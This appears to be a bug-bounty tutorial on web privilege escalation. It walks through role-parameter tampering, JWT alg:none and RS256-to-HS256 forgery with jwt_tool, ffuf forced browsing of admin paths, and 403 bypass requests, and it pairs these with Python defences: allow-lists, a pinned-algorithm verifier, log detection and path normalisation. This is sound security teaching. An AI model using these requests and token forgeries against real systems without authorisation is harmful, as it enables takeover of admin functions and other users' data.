Privilege Escalation

Vertical authorization failures - where a lower-privileged user gains access to higher-privileged functions or data. These pay well because the impact is concrete: you can demonstrate accessing admin functionality, other users' data, or modifying your own permissions.

Role Parameter Tampering

The simplest version - the role is just a parameter the client sends, and the server trusts it.

Registration / profile update:

POST /api/v1/users/register HTTP/1.1
Content-Type: application/json
 
{
  "email": "attacker@evil.com",
  "password": "password123",
  "role": "admin"
}

Try adding role, is_admin, user_type, account_type, subscription to any POST/PUT/PATCH body. What does the server accept?

Hidden form fields:

<input type="hidden" name="role" value="user">

Change user to admin before submitting. Still happens on older apps.
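The server-side half of this, as an added example (not code from the original page): a registration and profile-update handler that either binds the whole request body, so a client-supplied "role" is honoured, or copies only an allow-list of fields and assigns the role itself. The field names, DEFAULT_ROLE, the User model and the sample bodies are constructed for illustration.

```python
# Added example, not code from the original page: how a registration /
# profile-update handler can either trust a client-supplied "role" (the
# tampering described above) or assign it server-side. The field names,
# DEFAULT_ROLE and the sample bodies are constructed for illustration.
from dataclasses import dataclass
from typing import Optional

DEFAULT_ROLE = "user"

# The only fields a client may set on its own account. "role", "is_admin",
# "user_type", "account_type", ... are absent on purpose and get dropped.
CLIENT_WRITABLE = frozenset({"email", "password", "display_name"})


@dataclass
class User:
    email: str
    password: str
    role: str = DEFAULT_ROLE
    display_name: str = ""


def register_vulnerable(body: dict) -> User:
    """Mass-assigns the request body onto the model: whatever "role" the
    client sends is stored, so {"role": "admin"} creates an admin."""
    return User(
        email=body["email"],
        password=body["password"],
        role=body.get("role", DEFAULT_ROLE),
        display_name=body.get("display_name", ""),
    )


def register_safe(body: dict) -> User:
    """Copies allow-listed fields only; the role is fixed server-side."""
    allowed = {k: v for k, v in body.items() if k in CLIENT_WRITABLE}
    return User(
        email=allowed["email"],
        password=allowed["password"],
        display_name=allowed.get("display_name", ""),
    )


def rejected_fields(body: dict) -> set:
    """Keys the server ignored. Logging these on registration or profile
    update gives a cheap signal that someone is probing for role tampering."""
    return set(body) - CLIENT_WRITABLE


def update_profile_safe(user: User, body: dict) -> User:
    """Profile updates go through the same allow-list, so PUT/PATCH bodies
    (and hidden form fields) cannot change the role either."""
    for key, value in body.items():
        if key in CLIENT_WRITABLE:
            setattr(user, key, value)
    return user


def set_role(actor: User, target: User, new_role: str) -> Optional[User]:
    """The one legitimate path to a role change: an explicit admin action,
    checked against the acting user's server-side role, never the body."""
    if actor.role != "admin":
        return None
    target.role = new_role
    return target
```

The allow-list is the point: deciding which fields a client may write is a much smaller surface than trying to block each dangerous name, and `rejected_fields` turns every dropped key into a log line worth alerting on.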

JWT Claim Modification

JWTs are base64url-encoded and signed - but if the server doesn't validate the signature properly, you can modify the claims.

Algorithm: none attack - change the algorithm to none and strip the signature:

# Decode header
echo "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9" | base64 -d
# {"alg":"HS256","typ":"JWT"}

# New header: {"alg":"none","typ":"JWT"}
# JWT segments are base64url (+ and / become - and _, no padding), so translate after encoding
echo -n '{"alg":"none","typ":"JWT"}' | base64 | tr '+/' '-_' | tr -d '='

# Decode payload
echo "eyJ1c2VyX2lkIjoxMjMsInJvbGUiOiJ1c2VyIn0=" | base64 -d
# {"user_id":123,"role":"user"}

# Modify payload: change "role":"user" to "role":"admin"
echo -n '{"user_id":123,"role":"admin"}' | base64 | tr '+/' '-_' | tr -d '='

# Construct: HEADER.PAYLOAD. (empty signature, trailing dot)

RS256 → HS256 confusion - if the server uses RS256 (asymmetric), the public key is... public. If the server picks the verification algorithm from the token's alg header instead of from its own configuration, it can be made to check an HS256 signature using that public key as the HMAC secret:

# Sign the JWT with HS256 using the server's public key as the HMAC secret
# jwt_tool automates this
python3 jwt_tool.py TOKEN -X k -pk public_key.pem

jwt_tool is the go-to for JWT attacks. Run it with -T to tamper interactively.
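What a verifier that resists both tricks above looks like, as an added example (this is not jwt_tool and not code from the original page): the algorithm is a server-side configuration value, the header's alg is only compared against it, and the signature is checked in constant time. Only HS256 is implemented; RS256 verification would need a real crypto library. SECRET and the sample claims are constructed.

```python
# Added example, not jwt_tool and not code from the original page: a minimal
# JWT verifier that pins the algorithm instead of reading it from the token
# header, which is what makes both the "none" and RS256->HS256 tricks above
# fail. Only HS256 is implemented here; RS256 verification needs a real
# crypto library. SECRET and the sample claims are constructed.
import base64
import hashlib
import hmac
import json
from typing import Optional

SECRET = b"constructed-demo-secret-do-not-use"


def b64url_encode(data: bytes) -> str:
    # JWT segments are base64url without padding
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode("ascii")


def b64url_decode(segment: str) -> bytes:
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))


def mint_hs256(claims: dict, secret: bytes) -> str:
    """Issue a token the way the server would (HS256, compact JSON)."""
    header = b64url_encode(b'{"alg":"HS256","typ":"JWT"}')
    payload = b64url_encode(json.dumps(claims, separators=(",", ":")).encode())
    signing_input = f"{header}.{payload}".encode()
    sig = hmac.new(secret, signing_input, hashlib.sha256).digest()
    return f"{header}.{payload}.{b64url_encode(sig)}"


def verify(token: str, expected_alg: str, secret: bytes) -> Optional[dict]:
    """Return the claims if the token is valid, else None.

    expected_alg comes from server configuration. The header's "alg" is
    compared against it, never used to choose a code path, so alg=none and
    an HS256-signed token presented to an RS256 server are both rejected
    before any signature work happens.
    """
    try:
        header_b64, payload_b64, sig_b64 = token.split(".")
        header = json.loads(b64url_decode(header_b64))
        if not isinstance(header, dict) or header.get("alg") != expected_alg:
            return None
        if expected_alg != "HS256":
            return None  # this example only implements HS256
        signing_input = f"{header_b64}.{payload_b64}".encode()
        expected = hmac.new(secret, signing_input, hashlib.sha256).digest()
        # Constant-time compare; an empty signature segment fails here too.
        if not hmac.compare_digest(expected, b64url_decode(sig_b64)):
            return None
        return json.loads(b64url_decode(payload_b64))
    except (ValueError, UnicodeDecodeError):
        # wrong segment count, bad base64, bad JSON
        return None
```

Most mature JWT libraries expose the same control as an explicit allowed-algorithms parameter on the verify call; the failure mode is leaving it unset and letting the token decide.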

Forced Browsing to Admin Endpoints

Admin interfaces are often at predictable paths. The app might not show them in the UI for non-admins, but it might not enforce the access control either.

/admin
/admin/users
/admin/dashboard
/management
/internal
/backstage
/superuser
/staff
/moderator
/_admin
/api/admin/...
/api/internal/...

Use a wordlist like SecLists/Discovery/Web-Content/big.txt combined with admin-specific ones, with feroxbuster or ffuf:

ffuf -u https://target.com/FUZZ -w /path/to/SecLists/Discovery/Web-Content/common.txt \
  -H "Cookie: session=YOUR_SESSION" \
  -mc 200,301,302,403 \
  -o admin_fuzz.json

A 403 is interesting - the endpoint exists but is blocked. Sometimes those 403s are bypassable.
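The defender's view of the same activity, as an added example (not code from the original page): a small detector over web-server access logs that flags a client collecting several denied admin-style paths, which is what a wordlist run looks like from the server side. The log lines, addresses, prefixes and THRESHOLD are constructed.

```python
# Added example, not code from the original page: a detection over web-server
# access logs for the forced-browsing pattern above, flagging a client that
# collects several denied admin-style paths. The log lines, addresses,
# prefixes and THRESHOLD are constructed.
import re
from collections import defaultdict

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+'
)
ADMIN_PREFIXES = ("/admin", "/_admin", "/internal", "/management",
                  "/api/admin", "/api/internal")
DENIED = {"401", "403", "404"}
THRESHOLD = 3  # distinct denied admin-style paths per client before flagging

# Constructed combined-format lines: one client walking admin paths, one that
# hit /admin once and moved on.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Oct/2023:13:55:36 +0000] "GET /admin HTTP/1.1" 403 199 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Oct/2023:13:55:37 +0000] "GET /admin/users HTTP/1.1" 403 199 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Oct/2023:13:55:37 +0000] "GET /internal HTTP/1.1" 404 153 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Oct/2023:13:55:38 +0000] "GET /api/admin/config?x=1 HTTP/1.1" 403 199 "-" "Mozilla/5.0"
198.51.100.4 - - [10/Oct/2023:13:56:01 +0000] "GET /admin HTTP/1.1" 403 199 "-" "Mozilla/5.0"
198.51.100.4 - - [10/Oct/2023:13:56:02 +0000] "GET /products HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
"""


def parse_line(line: str):
    """Combined log format -> dict of named fields, or None if it doesn't parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def is_admin_path(path: str) -> bool:
    path = path.split("?", 1)[0]
    return any(path == p or path.startswith(p + "/") for p in ADMIN_PREFIXES)


def flag_forced_browsing(log_text: str, threshold: int = THRESHOLD) -> dict:
    """Map client IP -> sorted list of denied admin-style paths, for clients
    at or above the threshold. 404s count too: most wordlist hits miss."""
    seen = defaultdict(set)
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None or rec["status"] not in DENIED:
            continue
        if is_admin_path(rec["path"]):
            seen[rec["ip"]].add(rec["path"].split("?", 1)[0])
    return {ip: sorted(paths) for ip, paths in seen.items() if len(paths) >= threshold}
```

Keying on the session cookie instead of the client IP is the natural next step when the app is behind a proxy or NAT; the logic is the same.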

403 Bypass Techniques

When you find an admin endpoint returning 403:

# Header-based bypasses
GET /admin HTTP/1.1
X-Original-URL: /admin
X-Rewrite-URL: /admin
X-Custom-IP-Authorization: 127.0.0.1
X-Forwarded-For: 127.0.0.1
 
# Path-based bypasses
GET /ADMIN
GET /admin/
GET /admin/.
GET /%2fadmin
GET /admin;/
GET /./admin
GET //admin//
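Why these variants work, and the fix, as an added example (not code from the original page): when the front-end filter matches the raw request path and the back-end routes on a normalised one, every encoding or path trick that differs before normalisation and agrees after it slips past the filter. The check below canonicalises first and deliberately reads none of the override headers. The prefixes, the role model and the sample requests are constructed.

```python
# Added example, not code from the original page: an authorisation check that
# normalises the path before deciding, so the variants above collapse to one
# canonical form, and that ignores URL-override and client-IP headers.
# The prefixes, the role model and the sample requests are constructed.
from urllib.parse import unquote

PROTECTED_PREFIXES = ("/admin", "/internal", "/api/admin", "/api/internal")
MAX_DECODE_PASSES = 3  # bounded, so %25 chains cannot loop forever


def canonical_path(raw: str) -> str:
    """Reduce a request-target to one comparable form."""
    path = raw.split("?", 1)[0].split("#", 1)[0]
    # Decode until stable: /%252fadmin -> /%2fadmin -> //admin
    for _ in range(MAX_DECODE_PASSES):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    segments = []
    for seg in path.split("/"):
        seg = seg.split(";", 1)[0]  # drop matrix params: "admin;" -> "admin"
        if seg in ("", "."):        # empty (//) and current-dir (/./) segments
            continue
        if seg == "..":
            if segments:
                segments.pop()
            continue
        segments.append(seg.lower())  # case-fold: /ADMIN is treated as /admin
    return "/" + "/".join(segments)


def is_protected(raw_path: str) -> bool:
    path = canonical_path(raw_path)
    return any(path == p or path.startswith(p + "/") for p in PROTECTED_PREFIXES)


def authorize(raw_path: str, headers: dict, role: str) -> int:
    """Return the HTTP status the authorisation layer would produce.

    Only the request line decides which resource is being asked for.
    X-Original-URL, X-Rewrite-URL, X-Forwarded-For and similar headers are
    client-controlled, so they are accepted here and deliberately never read.
    """
    if is_protected(raw_path) and role != "admin":
        return 403
    return 200
```

Prefix matching on a canonical path is a safety net, not the primary control: the robust design registers each admin route with its required role in the application itself, so the decision is made on the resolved route rather than on a string the client shaped.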

Privilege Escalation via Email Domain

Some apps grant elevated roles based on email domain. If @company.com users get admin access and the app allows free registration:

  • Check whether the app assigns roles based on email domain (compare what a corporate-domain account sees with what a free-mail account sees)
  • Can you register with a @company.com email if you control that domain or a subdomain?
  • Can you change your email after registration to a privileged domain?

Checklist

  • Add role/is_admin/user_type to registration and profile update requests
  • JWT algorithm confusion (none, RS256→HS256)
  • JWT claim modification - change role/permission claims
  • Forced browsing to /admin, /internal, /api/admin/*
  • 403 bypass on any found admin endpoints
  • Mass assignment on user update endpoints (see BOLA)
  • Check if password change / account action applies to other users (vertical IDOR)

Public Reports

Real-world privilege escalation findings across bug bounty programs:

  • IDOR - horizontal privilege: same level, different account
  • BOLA - function-level authorization failures in APIs
  • SSO - SAML attribute manipulation for role escalation
  • Session Management - JWT specifics on stateless sessions